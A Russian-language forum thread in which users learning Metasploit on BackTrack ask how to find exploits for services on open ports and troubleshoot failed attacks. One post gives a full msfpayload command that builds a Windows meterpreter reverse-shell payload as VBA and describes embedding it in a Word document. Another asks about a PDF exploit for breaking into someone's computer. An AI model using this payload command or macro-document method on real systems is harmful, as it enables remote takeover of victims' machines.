![]() |
Доброго всем времени суток!
В процессе изучения Metasploit'a 3.5.1 (версия из BackTrack'a 4r2) сталкнулся с проблемой: никак не могу найти есть ли поиск уязвимости и сплоита к ней по сервису слушающему конкретный порт на цели проникновения? Или нужно досканально знать какой сплоит какую уязвимую версию сервиса юзает? З.Ы. в манах ничего не нашел =( И хотел бы уточнить, правильно ли я понимаю порядок действий? 1. сканирование цели на нахождение открытых портов, определения ОСи, сервисов, и версий 2. находение сплоита отвечающего требованиям найденного, и конечной цели 3. использование сплоита с начинкой. Зарание спасибо. |
Цитата:
Ну и автоподбор эксплойта рекомендую fast-track. |
ХМ....вот как бы кто то пробовал сплоин в backtrack который через адоб ПДФ открывает ключик в домик Ю_зверька???а то потренироватся не как просто не могу найти второй комп....а не кто не соглашается))
???? |
Цитата:
|
Здравствуйте. у меня такая проблемка
прописываю msfpayload windows/meterpreter/reverse_tcp LHOST=ip LPORT=port V > test.bas после это создаю вордовский документ .doc вставляю туда test.bas через visual basic и когда нажимаю сохранить выводит ошибку "сбой сохранения из-за недостатка памяти или места на диске" места на диске 30 гб подскажите в чем проблема? спасибо. |
после запуска сплоита получаю вот такой ответ
[*] Started reverse double handler [*] Sending Backdoor Command [-] Not backdoored [*] Exploit completed, but no session was created. это значит что просто не удалось создать обратную связь (плохая начинка)? или что эксплойт не сработал? |
Цитата:
|
Цитата:
|
| Время: 05:00 |